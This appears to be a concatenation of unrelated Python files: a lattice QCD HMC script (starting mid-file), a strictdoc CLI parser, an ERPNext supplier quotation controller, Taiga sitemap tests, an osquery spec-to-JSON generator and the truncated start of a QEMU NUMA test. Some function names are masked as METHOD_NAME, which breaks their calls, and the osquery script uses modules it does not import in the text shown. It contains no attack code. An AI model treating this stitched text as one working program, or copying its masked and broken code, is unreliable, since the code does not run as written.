    # from the checkpoint identity so restarted runs are reproducible.
    g.copy(U, g.load(f"{dst}/ckpoint_lat.{latest_it}"))
    rng = g.random(f"test{dst}{latest_it}", "vectorized_ranlux24_24_64")
    it0 = latest_it + 1
pc = g.qcd.fermion.preconditioner
inv = g.algorithms.inverter
eofa_ratio = g.qcd.pseudofermion.action.exact_one_flavor_ratio
def two_flavor_ratio(fermion, m1, m2, solver):
    """Two-flavor even-odd Schur ratio action det(D(m1))/det(D(m2))."""
    numerator = fermion(m1, m1)
    denominator = fermion(m2, m2)
    return g.qcd.pseudofermion.action.two_flavor_ratio_evenodd_schur(
        [numerator, denominator], solver
    )
def METHOD_NAME(U0, m_plus, m_minus):
    """Build the Mobius domain-wall fermion operator on gauge field U0.

    m_plus / m_minus are the masses for the two chiralities; the other
    parameters (M5, Mobius b/c, Ls, antiperiodic time boundary) are fixed
    for this ensemble.
    """
    return g.qcd.fermion.mobius(
        U0,
        mass_plus=m_plus,
        mass_minus=m_minus,
        M5=1.8,
        b=1.5,
        c=0.5,
        Ls=8,
        boundary_phases=[1, 1, 1, -1],
    )
pc = g.qcd.fermion.preconditioner
inv = g.algorithms.inverter
sympl = g.algorithms.integrator.symplectic
F_grid_eo = METHOD_NAME(U, 1, 1).F_grid_eo
cg_e = inv.cg({"eps": 1e-10, "maxiter": 20000})
cg_s = inv.cg(
{"eps": 1e-7, "maxiter": 20000}
) # 1e-5 -> dH=O(5), 1e-6 -> dH=O(0.18), 1e-7 -> dH=O(0.048)
slv_e = inv.preconditioned(pc.eo2_ne(), cg_e)
slv_s = inv.mixed_precision(inv.preconditioned(pc.eo2_ne(), cg_s), g.single, g.double)
# conjugate momenta
U_mom = g.group.cartesian(U)
rng.normal_element(U_mom)
action_gauge_mom = g.qcd.scalar.action.mass_term()
action_gauge = g.qcd.gauge.action.iwasaki(2.12)
rat = g.algorithms.rational.zolotarev_inverse_square_root(1.0**0.5, 11**0.5, 7)
rat_fnc = g.algorithms.rational.rational_function(rat.zeros, rat.poles, rat.norm)
# see params.py for parameter motivation
hasenbusch_ratios = [ # Nf=2+1
(0.45, 1.0, None, two_flavor_ratio, cg_e, cg_s),
(0.18, 0.45, None, two_flavor_ratio, cg_e, cg_s),
(0.07, 0.18, None, two_flavor_ratio, cg_e, cg_s),
(0.017, 0.07, None, two_flavor_ratio, cg_e, cg_s),
(0.002356, 0.017, None, two_flavor_ratio, cg_e, cg_s),
(0.03366, 1.0, rat_fnc, eofa_ratio, slv_e, slv_s),
# (0.001477, 0.1, None, two_flavor_ratio, cg_e, cg_s),
# (1.0, 1.0, rat_fnc, eofa_ratio, slv_e, slv_s),
]
fields = [
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(F_grid_eo)]),
(U + [g.vspincolor(U[0].grid)]),
# (U + [g.vspincolor(F_grid_eo)]),
# (U + [g.vspincolor(U[0].grid)])
]
# test test
# rat = g.algorithms.rational.zolotarev_inverse_square_root(1.0**0.5, 4**0.5, 2)
# rat_fnc = g.algorithms.rational.rational_function(rat.zeros, rat.poles, rat.norm)
# hasenbusch_ratios = [ # Nf=2+1
# (0.6, 1.0, rat_fnc),
# (0.6, 1.0, rat_fnc),
# (0.6, 1.0, rat_fnc),
# (0.3, 0.6, rat_fnc),
# (0.3, 0.6, rat_fnc)
# ]
# test test end
# exact actions
action_fermions_e = [
af(lambda m_plus, m_minus: METHOD_NAME(U, m_plus, m_minus), m1, m2, se)
for m1, m2, rf, af, se, ss in hasenbusch_ratios
]
# sloppy actions
action_fermions_s = [
af(lambda m_plus, m_minus: METHOD_NAME(U, m_plus, m_minus), m1, m2, ss)
for m1, m2, rf, af, se, ss in hasenbusch_ratios
]
metro = g.algorithms.markov.metropolis(rng)
pure_gauge = True
split_rng = [
g.random(f"{[rng.cnormal() for i in range(4)]}") for j in range(len(hasenbusch_ratios))
]
# sd = g.split_map(
# U[0].grid,
# [
# lambda dst, ii=i:
# action_fermions_e[ii].draw(dst, split_rng[ii], hasenbusch_ratios[ii][2])
# if hasenbusch_ratios[ii][3] is eofa_ratio else
# action_fermions_e[ii].draw(dst, split_rng[ii])
# for i in range(len(hasenbusch_ratios))
# ],
# [1,2,2,2]
# )
def hamiltonian(draw):
    """Return (H, S): total Hamiltonian and the action part.

    With draw=True, momenta are refreshed and pseudofermions are drawn
    (start of a trajectory); with draw=False the current fields are
    evaluated (end of a trajectory, for accept/reject).
    """
    if draw:
        rng.normal_element(U_mom)
        s = action_gauge(U)
        if not pure_gauge:
            # sp = sd(fields)
            for i in range(len(hasenbusch_ratios)):
                if hasenbusch_ratios[i][3] is eofa_ratio:
                    # EOFA terms draw against the rational approximation, so
                    # compare drawn vs. evaluated action as a sanity check.
                    si = action_fermions_e[i].draw(fields[i], rng, hasenbusch_ratios[i][2])
                    # si = sp[i]
                    si_check = action_fermions_e[i](fields[i])
                    g.message("action", i, si_check)
                    r = f"{hasenbusch_ratios[i][0]}/{hasenbusch_ratios[i][1]}"
                    e = abs(si / si_check - 1)
                    g.message(f"Error of rational approximation for Hasenbusch ratio {r}: {e}")
                else:
                    si = action_fermions_e[i].draw(fields[i], rng)
                s += si
        h = s + action_gauge_mom(U_mom)
    else:
        s = action_gauge(U)
        if not pure_gauge:
            for i in range(len(hasenbusch_ratios)):
                s += action_fermions_e[i](fields[i])
        h = s + action_gauge_mom(U_mom)
    return h, s
# Collects per-force-term gradient norms and timings during MD integration.
log = sympl.log()
# sf = g.split_map(
#     U[0].grid,
#     [
#         lambda dst, src, ii=i: g.eval(dst, action_fermions_s[ii].gradient(src, src[0:len(U)]))
#         for i in range(len(hasenbusch_ratios))
#     ],
#     [1,2,2,2]
# )
def fermion_force():
    """Sum the sloppy-solver gradients of all fermion actions w.r.t. U.

    Returns one Lie-algebra field per gauge link direction; zero when in
    the pure-gauge phase.
    """
    x = [g.group.cartesian(u) for u in U]
    for y in x:
        y[:] = 0
    if not pure_gauge:
        forces = [[g.lattice(y) for y in x] for i in fields]
        log.time("fermion forces")
        for i in range(len(hasenbusch_ratios)):
            # Gradient only w.r.t. the gauge links (first len(U) components).
            forces[i] = action_fermions_s[i].gradient(fields[i], fields[i][0 : len(U)])
        log.time()
        for i in range(len(hasenbusch_ratios)):
            # Record each term's force magnitude, then accumulate.
            log.gradient(forces[i], f"{hasenbusch_ratios[i][0]}/{hasenbusch_ratios[i][1]} {i}")
            for j in range(len(x)):
                x[j] += forces[i][j]
    return x
# Position update (gauge links) driven by the momentum-term gradient.
iq = sympl.update_q(U, log(lambda: action_gauge_mom.gradient(U_mom, U_mom), "gauge_mom"))
# Momentum updates from the gauge and fermion forces respectively.
ip_gauge = sympl.update_p(U_mom, log(lambda: action_gauge.gradient(U, U), "gauge"))
ip_fermion = sympl.update_p(U_mom, fermion_force)
# Nested leapfrog: fermion force on the outer OMF2, gauge force integrated
# more finely on the inner OMF2.
# mdint = sympl.OMF4(1, ip_fermion, sympl.OMF2(4, ip_gauge, iq))
mdint = sympl.OMF2(15, ip_fermion, sympl.OMF2(4, ip_gauge, iq))
def hmc(tau):
    """Run one HMC trajectory of length tau.

    Returns [accepted, dS, dH] where `accepted` is the Metropolis decision.
    """
    accrej = metro(U)
    h_before, s_before = hamiltonian(True)
    mdint(tau)
    h_after, s_after = hamiltonian(False)
    return [accrej(h_after, h_before), s_after - s_before, h_after - h_before]
accept, total = 0, 0
for it in range(it0, N):
    # First 10 iterations: gauge-only thermalization, no fermion actions.
    pure_gauge = it < 10
    g.message(pure_gauge)
    a, dS, dH = hmc(1.0)
    accept += a
    total += 1
    plaq = g.qcd.gauge.plaquette(U)
    g.message(f"HMC {it} has P = {plaq}, dS = {dS}, dH = {dH}, acceptance = {accept/total}")
    for x in log.grad:
        g.message(f"{x} force norm2/sites =", np.mean(log.get(x)), "+-", np.std(log.get(x)))
    g.message(f"Timing:\n{log.time}")
    if it % 10 == 0:
        # reset statistics
        log.reset()
        g.message("Reset log")
        # Checkpoint the gauge field every 10 trajectories (NERSC format).
        g.save(f"{dst}/ckpoint_lat.{it}", U, g.format.nersc())
        # g.save(f"{dst}/ckpoint_lat.{it}", U)
import os
from typing import List, Optional
from strictdoc.cli.command_parser_builder import CommandParserBuilder
from strictdoc.helpers.auto_described import auto_described
class ImportReqIFCommandConfig:
    """Configuration for the `import reqif` command."""

    input_path: str
    output_path: str
    profile: Optional[str]

    def __init__(self, input_path: str, output_path: str, profile):
        self.input_path = input_path
        self.output_path = output_path
        self.profile = profile
class ManageAutoUIDCommandConfig:
    """Configuration for the `manage auto-uid` command."""

    input_path: str

    def __init__(self, *, input_path: str):
        self.input_path = input_path
class ImportExcelCommandConfig:
    """Configuration for the `import excel` command."""

    def __init__(self, input_path, output_path, parser):
        # Source spreadsheet, destination path, and parser identifier.
        self.input_path, self.output_path, self.parser = input_path, output_path, parser
class PassthroughCommandConfig:
    """Input/output file pair for the `passthrough` command."""

    def __init__(self, input_file, output_file):
        self.input_file, self.output_file = input_file, output_file
@auto_described
class ServerCommandConfig:
    """Configuration for the `server` command (development web server)."""

    def __init__(
        self,
        *,
        input_path: str,
        output_path: Optional[str],
        reload: bool,
        port: Optional[int],
    ):
        # NOTE(review): `assert` is stripped under `python -O`, so the
        # existence check would silently disappear — consider raising instead.
        assert os.path.exists(input_path)
        # Store an absolute path so later cwd changes cannot break resolution.
        abs_input_path = os.path.abspath(input_path)
        self.input_path: str = abs_input_path
        self.output_path: Optional[str] = output_path
        self.reload: bool = reload
        self.port: Optional[int] = port
@auto_described
class ExportCommandConfig:  # pylint: disable=too-many-instance-attributes
    """Configuration for the `export` command."""

    def __init__(  # pylint: disable=too-many-arguments
        self,
        input_paths,
        output_dir: str,
        project_title: Optional[str],
        formats,
        fields,
        no_parallelization,
        enable_mathjax,
        reqif_profile: Optional[str],
        experimental_enable_file_traceability,
    ):
        assert isinstance(input_paths, list), f"{input_paths}"
        self.input_paths: List[str] = input_paths
        self.output_dir: str = output_dir
        self.project_title: Optional[str] = project_title
        self.formats = formats
        self.fields = fields
        self.no_parallelization = no_parallelization
        self.enable_mathjax = enable_mathjax
        self.reqif_profile: Optional[str] = reqif_profile
        self.experimental_enable_file_traceability = (
            experimental_enable_file_traceability
        )
        # HTML output always lands in <output_dir>/html.
        self.output_html_root: str = os.path.join(output_dir, "html")
class DumpGrammarCommandConfig:
    """Destination file for the `dump-grammar` command."""

    def __init__(self, output_file):
        self.output_file = output_file
class SDocArgsParser:
    """Thin wrapper over the parsed CLI namespace.

    Exposes which (sub)command was requested via `is_*` properties and
    builds the matching *CommandConfig object via `get_*_config` methods.
    """

    def __init__(self, args):
        self.args = args

    @property
    def is_about_command(self):
        return self.args.command == "about"

    @property
    def is_passthrough_command(self):
        return self.args.command == "passthrough"

    @property
    def is_export_command(self):
        return self.args.command == "export"

    @property
    def is_import_command_reqif(self):
        return (
            self.args.command == "import" and self.args.import_format == "reqif"
        )

    @property
    def METHOD_NAME(self):
        return (
            self.args.command == "import" and self.args.import_format == "excel"
        )

    @property
    def is_server_command(self):
        return self.args.command == "server"

    @property
    def is_dump_grammar_command(self):
        return self.args.command == "dump-grammar"

    @property
    def is_version_command(self):
        return self.args.command == "version"

    @property
    def is_manage_autouid_command(self):
        return (
            self.args.command == "manage" and self.args.subcommand == "auto-uid"
        )

    def get_passthrough_config(self) -> PassthroughCommandConfig:
        return PassthroughCommandConfig(
            self.args.input_file, self.args.output_file
        )

    def get_export_config(self) -> ExportCommandConfig:
        project_title: Optional[str] = self.args.project_title
        # Default to ./output, resolved against the current working directory.
        output_dir = self.args.output_dir if self.args.output_dir else "output"
        if not os.path.isabs(output_dir):
            cwd = os.getcwd()
            output_dir = os.path.join(cwd, output_dir)
        return ExportCommandConfig(
            self.args.input_paths,
            output_dir,
            project_title,
            self.args.formats,
            self.args.fields,
            self.args.no_parallelization,
            self.args.enable_mathjax,
            self.args.reqif_profile,
            self.args.experimental_enable_file_traceability,
        )

    def get_import_config_reqif(self, _) -> ImportReqIFCommandConfig:
        return ImportReqIFCommandConfig(
            self.args.input_path, self.args.output_path, self.args.profile
        )

    def get_manage_autouid_config(self) -> ManageAutoUIDCommandConfig:
        return ManageAutoUIDCommandConfig(input_path=self.args.input_path)

    def get_import_config_excel(self, _) -> ImportExcelCommandConfig:
        return ImportExcelCommandConfig(
            self.args.input_path, self.args.output_path, self.args.parser
        )

    def get_server_config(self) -> ServerCommandConfig:
        return ServerCommandConfig(
            input_path=self.args.input_path,
            output_path=self.args.output_path,
            reload=self.args.reload,
            port=self.args.port,
        )

    def get_dump_grammar_config(self) -> DumpGrammarCommandConfig:
        return DumpGrammarCommandConfig(output_file=self.args.output_file)
def create_sdoc_args_parser(testing_args=None) -> SDocArgsParser:
    """Build an SDocArgsParser from sys.argv, or from `testing_args` in tests."""
    if testing_args:
        return SDocArgsParser(testing_args)
    builder = CommandParserBuilder()
    return SDocArgsParser(builder.build().parse_args())
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.utils import flt, getdate, nowdate
from erpnext.buying.utils import validate_for_items
from erpnext.controllers.buying_controller import BuyingController
form_grid_templates = {"items": "templates/form_grid/item_grid.html"}
class SupplierQuotation(BuyingController):
    """Quotation received from a supplier, usually replying to a Request
    for Quotation (RFQ)."""

    def METHOD_NAME(self):
        """Validate status, items, linked documents, UOMs and validity date."""
        super(SupplierQuotation, self).METHOD_NAME()
        if not self.status:
            self.status = "Draft"

        from erpnext.controllers.status_updater import validate_status

        validate_status(self.status, ["Draft", "Submitted", "Stopped", "Cancelled"])
        validate_for_items(self)
        self.validate_with_previous_doc()
        self.validate_uom_is_integer("uom", "qty")
        self.validate_valid_till()

    def on_submit(self):
        self.db_set("status", "Submitted")
        # Include this quotation when recomputing RFQ supplier statuses.
        self.update_rfq_supplier_status(1)

    def on_cancel(self):
        self.db_set("status", "Cancelled")
        # Exclude this quotation when recomputing RFQ supplier statuses.
        self.update_rfq_supplier_status(0)

    def on_trash(self):
        pass

    def validate_with_previous_doc(self):
        """Cross-check company/item/UOM against the source Material Request."""
        super(SupplierQuotation, self).validate_with_previous_doc(
            {
                "Material Request": {
                    "ref_dn_field": "prevdoc_docname",
                    "compare_fields": [["company", "="]],
                },
                "Material Request Item": {
                    "ref_dn_field": "prevdoc_detail_docname",
                    "compare_fields": [["item_code", "="], ["uom", "="]],
                    "is_child_table": True,
                },
            }
        )

    def validate_valid_till(self):
        if self.valid_till and getdate(self.valid_till) < getdate(self.transaction_date):
            frappe.throw(_("Valid till Date cannot be before Transaction Date"))

    def update_rfq_supplier_status(self, include_me):
        """Recompute this supplier's quote_status on every linked RFQ.

        include_me: 1 to count this quotation's own items (on submit),
        0 to ignore them (on cancel).
        """
        rfq_list = set([])
        for item in self.items:
            if item.request_for_quotation:
                rfq_list.add(item.request_for_quotation)
        for rfq in rfq_list:
            doc = frappe.get_doc("Request for Quotation", rfq)
            doc_sup = frappe.get_all(
                "Request for Quotation Supplier",
                filters={"parent": doc.name, "supplier": self.supplier},
                fields=["name", "quote_status"],
            )
            doc_sup = doc_sup[0] if doc_sup else None
            if not doc_sup:
                frappe.throw(
                    _("Supplier {0} not found in {1}").format(
                        self.supplier,
                        "<a href='desk/app/Form/Request for Quotation/{0}'> Request for Quotation {0} </a>".format(
                            doc.name
                        ),
                    )
                )
            # "Received" only if every RFQ item has at least one submitted
            # quotation line from this supplier; otherwise "Pending".
            quote_status = _("Received")
            for item in doc.items:
                sqi_count = frappe.db.sql(
                    """
                    SELECT
                        COUNT(sqi.name) as count
                    FROM
                        `tabSupplier Quotation Item` as sqi,
                        `tabSupplier Quotation` as sq
                    WHERE sq.supplier = %(supplier)s
                        AND sqi.docstatus = 1
                        AND sq.name != %(me)s
                        AND sqi.request_for_quotation_item = %(rqi)s
                        AND sqi.parent = sq.name""",
                    {"supplier": self.supplier, "rqi": item.name, "me": self.name},
                    as_dict=1,
                )[0]
                self_count = (
                    sum(my_item.request_for_quotation_item == item.name for my_item in self.items)
                    if include_me
                    else 0
                )
                if (sqi_count.count + self_count) == 0:
                    quote_status = _("Pending")
            frappe.db.set_value(
                "Request for Quotation Supplier", doc_sup.name, "quote_status", quote_status
            )
def get_list_context(context=None):
    """Portal list-view context for Supplier Quotation."""
    from erpnext.controllers.website_list_for_contact import get_list_context

    list_context = get_list_context(context)
    portal_settings = {
        "show_sidebar": True,
        "show_search": True,
        "no_breadcrumbs": True,
        "title": _("Supplier Quotation"),
    }
    list_context.update(portal_settings)
    return list_context
@frappe.whitelist()
def make_purchase_order(source_name, target_doc=None):
    """Map a submitted Supplier Quotation into a draft Purchase Order."""

    def set_missing_values(source, target):
        # Let the new Purchase Order fill defaults and recompute totals.
        target.run_method("set_missing_values")
        target.run_method("get_schedule_dates")
        target.run_method("calculate_taxes_and_totals")

    def update_item(obj, target, source_parent):
        # Stock qty is expressed in the stock UOM: qty x conversion factor.
        target.stock_qty = flt(obj.qty) * flt(obj.conversion_factor)

    doclist = get_mapped_doc(
        "Supplier Quotation",
        source_name,
        {
            "Supplier Quotation": {
                "doctype": "Purchase Order",
                "validation": {
                    "docstatus": ["=", 1],
                },
            },
            "Supplier Quotation Item": {
                "doctype": "Purchase Order Item",
                "field_map": [
                    ["name", "supplier_quotation_item"],
                    ["parent", "supplier_quotation"],
                    ["material_request", "material_request"],
                    ["material_request_item", "material_request_item"],
                    ["sales_order", "sales_order"],
                ],
                "postprocess": update_item,
            },
            "Purchase Taxes and Charges": {
                "doctype": "Purchase Taxes and Charges",
            },
        },
        target_doc,
        set_missing_values,
    )

    # Rates come from the quotation, so skip price-list repricing on load.
    doclist.set_onload("ignore_price_list", True)

    return doclist
@frappe.whitelist()
def make_purchase_invoice(source_name, target_doc=None):
    """Map a submitted Supplier Quotation into a draft Purchase Invoice."""
    mapping = {
        "Supplier Quotation": {
            "doctype": "Purchase Invoice",
            "validation": {
                "docstatus": ["=", 1],
            },
        },
        "Supplier Quotation Item": {"doctype": "Purchase Invoice Item"},
        "Purchase Taxes and Charges": {"doctype": "Purchase Taxes and Charges"},
    }
    return get_mapped_doc("Supplier Quotation", source_name, mapping, target_doc)
@frappe.whitelist()
def make_quotation(source_name, target_doc=None):
    """Map a Supplier Quotation into a sales-side Quotation (sales items only)."""
    mapping = {
        "Supplier Quotation": {
            "doctype": "Quotation",
            "field_map": {
                "name": "supplier_quotation",
            },
        },
        "Supplier Quotation Item": {
            "doctype": "Quotation Item",
            # Only items flagged as sales items are carried over.
            "condition": lambda doc: frappe.db.get_value("Item", doc.item_code, "is_sales_item") == 1,
            "add_if_empty": True,
        },
    }
    return get_mapped_doc("Supplier Quotation", source_name, mapping, target_doc)
def set_expired_status():
    """Mark Supplier Quotations whose `valid_till` has passed as Expired.

    Quotations already in a terminal status (Cancelled/Stopped) are left
    untouched. Intended to be run from a scheduled job.
    """
    frappe.db.sql(
        """
        UPDATE
            `tabSupplier Quotation` SET `status` = 'Expired'
        WHERE
            `status` not in ('Cancelled', 'Stopped') AND `valid_till` < %s
        """,
        # Explicit one-element tuple: `(nowdate())` is just a bare value and
        # only worked because frappe tolerates non-sequence parameters.
        (nowdate(),),
    )
import pytest
from django.urls import reverse
from lxml import etree
from taiga.users.models import User
from tests import factories as f
from tests.utils import disconnect_signals, reconnect_signals
# Every test in this module needs database access.
pytestmark = pytest.mark.django_db

# XML namespace map for querying <loc> elements out of sitemap documents.
NAMESPACES = {
    "sitemapindex": "http://www.sitemaps.org/schemas/sitemap/0.9",
}
def setup_module(module):
    # Disconnect model signals so factory creation has no side effects.
    disconnect_signals()
def teardown_module(module):
    # Restore the signals disconnected in setup_module.
    reconnect_signals()
@pytest.fixture
def data():
    """One public and one private project, every module enabled, plus one
    object of each sitemap-relevant type per project.

    Only public-project objects should ever appear in sitemaps.
    """
    m = type("InitialData", (object,), {})()

    m.project1 = f.ProjectFactory.create(is_private=False,
                                         is_epics_activated=True,
                                         is_backlog_activated=True,
                                         is_kanban_activated=True,
                                         is_issues_activated=True,
                                         is_wiki_activated=True)
    m.project2 = f.ProjectFactory.create(is_private=True,
                                         is_epics_activated=True,
                                         is_backlog_activated=True,
                                         is_kanban_activated=True,
                                         is_issues_activated=True,
                                         is_wiki_activated=True)

    m.epic11 = f.EpicFactory(project=m.project1)
    m.epic21 = f.EpicFactory(project=m.project2)

    m.milestone11 = f.MilestoneFactory(project=m.project1)
    m.milestone21 = f.MilestoneFactory(project=m.project2)

    m.us11 = f.UserStoryFactory(project=m.project1)
    m.us21 = f.UserStoryFactory(project=m.project2)

    m.task11 = f.TaskFactory(project=m.project1)
    m.task21 = f.TaskFactory(project=m.project2)

    m.issue11 = f.IssueFactory(project=m.project1)
    m.issue21 = f.IssueFactory(project=m.project2)

    m.wikipage11 = f.WikiPageFactory(project=m.project1)
    m.wikipage21 = f.WikiPageFactory(project=m.project2)

    return m
def test_sitemaps_index(client):
    """The sitemap index references all eleven section sitemaps."""
    response = client.get(reverse('front-sitemap-index'))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    # generics, projects, project_backlogs, project_kanbans, epics,
    # milestones, userstories, tasks, issues, wikipages, users
    assert len(locations) == 11
def test_sitemap_generics(client, data):
    """The generics section lists the five static front-end pages."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "generics"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    # "/", "/discover", "/login", "/register", "/forgot-password"
    assert len(locations) == 5
def test_sitemap_projects(client, data):
    """Only the public project is listed in the projects sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "projects"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_project_backlogs(client, data):
    """Only the public project's backlog appears in the backlogs sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "project-backlogs"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def METHOD_NAME(client, data):
    """Only the public project's kanban appears in the kanbans sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "project-kanbans"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_epics(client, data):
    """Only the public project's epic appears in the epics sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "epics"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_milestones(client, data):
    """Only the public project's milestone appears in the milestones sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "milestones"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_userstories(client, data):
    """Only the public project's user story appears in the userstories sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "userstories"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_tasks(client, data):
    """Only the public project's task appears in the tasks sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "tasks"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_issues(client, data):
    """Only the public project's issue appears in the issues sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "issues"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_wikipages(client, data):
    """Only the public project's wiki page appears in the wikipages sitemap."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "wikipages"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == 1
def test_sitemap_users(client, data):
    """The users sitemap lists every active, non-system user."""
    response = client.get(reverse('front-sitemap', kwargs={"section": "users"}))
    assert response.status_code == 200, response.data
    locations = etree.fromstring(response.content).xpath(
        "//sitemapindex:loc/text()", namespaces=NAMESPACES
    )
    assert len(locations) == User.objects.filter(is_active=True, is_system=False).count()
#!/usr/bin/env python3
# Copyright (c) 2014-present, The osquery authors
#
# This source code is licensed as defined by the LICENSE file found in the
# root directory of this source tree.
#
# SPDX-License-Identifier: (Apache-2.0 OR GPL-2.0-only)
"""
Generate a complete table specification for the website
This script will generate JSON output as expected by the osquery website given
a directory of osquery schema specifications. Results will be printer to stdout.
Usage:
python tools/codegen/genwebsitejson.py --specs=./specs
"""
# Copyright (c) 2014-present, The osquery authors
#
# This source code is licensed as defined by the LICENSE file found in the
# root directory of this source tree.
#
# SPDX-License-Identifier: (Apache-2.0 OR GPL-2.0-only)
import json
import os
import re
import sys
from gentable import *
# In the specs/ directory of the osquery repository, specification files are put
# in certain directories based on what platforms they are meant to be built on.
# This data structure represents the directories in specs/ and how they map to
# the operating systems which support tables found in those directories
PLATFORM_DIRS = {
    "specs": ["darwin", "linux", "windows"],
    "utility": ["darwin", "linux", "windows"],
    "yara": ["darwin", "linux", "windows"],
    "smart": ["darwin", "linux"],
    "darwin": ["darwin"],
    "kernel": ["darwin"],
    "linwin": ["linux", "windows"],
    "linux": ["linux"],
    "macwin": ["darwin", "windows"],
    "posix": ["darwin", "linux"],
    "sleuthkit": ["darwin", "linux"],
    "windows": ["windows"],
}

# Base URL used to link each spec back to its file on GitHub.
BASE_SOURCE_URL = "https://github.com/osquery/osquery/blob/master"
def platform_for_spec(path):
    """Given a path to a table specification, return a list of what osquery
    platforms that table will work on. In the event that no match is found, it
    will be assumed that the table is found on all platforms.
    """
    # os.path handles separators portably; the previous manual split on "/"
    # broke on Windows paths and the explicit [len-1] index was un-idiomatic.
    directory = os.path.basename(os.path.dirname(os.path.abspath(path)))
    # Fall back to "all platforms" instead of raising KeyError, as the
    # docstring promises for unknown directories.
    return PLATFORM_DIRS.get(directory, ["darwin", "linux", "windows"])
def remove_prefix(text, prefix):
    """Return `text` with a leading `prefix` removed, if present."""
    # python 3.9 has `removeprefix`, but I don't want to add that requirement.
    return text[len(prefix):] if text.startswith(prefix) else text
def METHOD_NAME(specs_dir, path):
    """Return the GitHub URL of the table specification at `path`."""
    relative = remove_prefix(path, specs_dir).lstrip("/ ")
    return os.path.join(BASE_SOURCE_URL, "specs", relative)
def generate_table_metadata(specs_dir, full_path):
    """This function generates a dictionary of table metadata for a spec file
    found at a given path."""
    with open(full_path, "r") as file_handle:
        # Each osquery table specification is a syntactically correct python file
        # because we imported `from gentable import *`, we imported all of the
        # functions that you use in an osquery specification. a global "table"
        # is then modified based on the python that has just executed.
        # NOTE: exec on repo-local spec files only — these are trusted input.
        tree = ast.parse(file_handle.read())
        exec(compile(tree, "<string>", "exec"))

        # Now that the `table` variable is accessible, we can access attributes
        # of the table
        t = {}
        t["name"] = table.table_name
        t["description"] = table.description
        t["url"] = METHOD_NAME(specs_dir, full_path)
        t["platforms"] = platform_for_spec(full_path)
        t["evented"] = "event_subscriber" in table.attributes
        t["cacheable"] = "cacheable" in table.attributes
        t["notes"] = table.notes
        t["examples"] = table.examples

        # Now we must iterate through `table.columns` to collect information
        # about each column
        t["columns"] = []
        for col in table.columns():
            c = {}
            c["name"] = col.name
            c["description"] = col.description
            # e.g. TEXT_TYPE -> "text"
            c["type"] = col.type.affinity.replace("_TYPE", "").lower()
            c["notes"] = col.notes
            c["hidden"] = col.options.get("hidden", False)
            c["required"] = col.options.get("required", False)
            c["index"] = col.options.get("index", False)
            if col.platforms != []:
                c["platforms"] = col.platforms
            t["columns"].append(c)
        return t
def main(argc, argv):
    """Walk the --specs tree for *.table files and print their metadata as JSON.

    argc/argv are accepted for symmetry with the __main__ call but argparse
    reads sys.argv itself.
    """
    parser = argparse.ArgumentParser(
        "Generate minmal JSON from a table spec")
    parser.add_argument("--specs", help="Path to spec directory", required=True)
    args = parser.parse_args()

    specs_dir = os.path.abspath(args.specs)
    tables = {}
    for subdir, dirs, files in os.walk(specs_dir):
        for filename in files:
            # Skip the example spec in the spec/ dir.
            # There is no actual example table in osquery so it should not be generated into the docs.
            if filename == "example.table":
                continue
            if filename.endswith(".table"):
                full_path = os.path.join(subdir, filename)
                metadata = generate_table_metadata(specs_dir, full_path)
                tables[metadata["name"]] = metadata

    # Print the JSON output to stdout, sorted by table name.
    print(json.dumps([value for key, value in sorted(tables.items())], indent=2, separators=(',', ':')))


if __name__ == "__main__":
    main(len(sys.argv), sys.argv)
import resource
from avocado.utils import process
from virttest import cpu
from virttest import env_process
from virttest import error_context
from virttest import utils_misc
from virttest import utils_test
from virttest import arch
from virttest.staging import utils_memory
@error_context.context_aware
def run(test, params, env):
    """
    Qemu numa consistency test:
    1) Get host numa topological structure
    2) Start a guest with the same node as the host, each node has one cpu
    3) Get the vcpu thread used cpu id in host and the cpu belongs which node
    4) Allocate memory inside guest and bind the allocate process to one of
       its vcpu.
    5) The memory used in host should increase in the same node if the vcpu
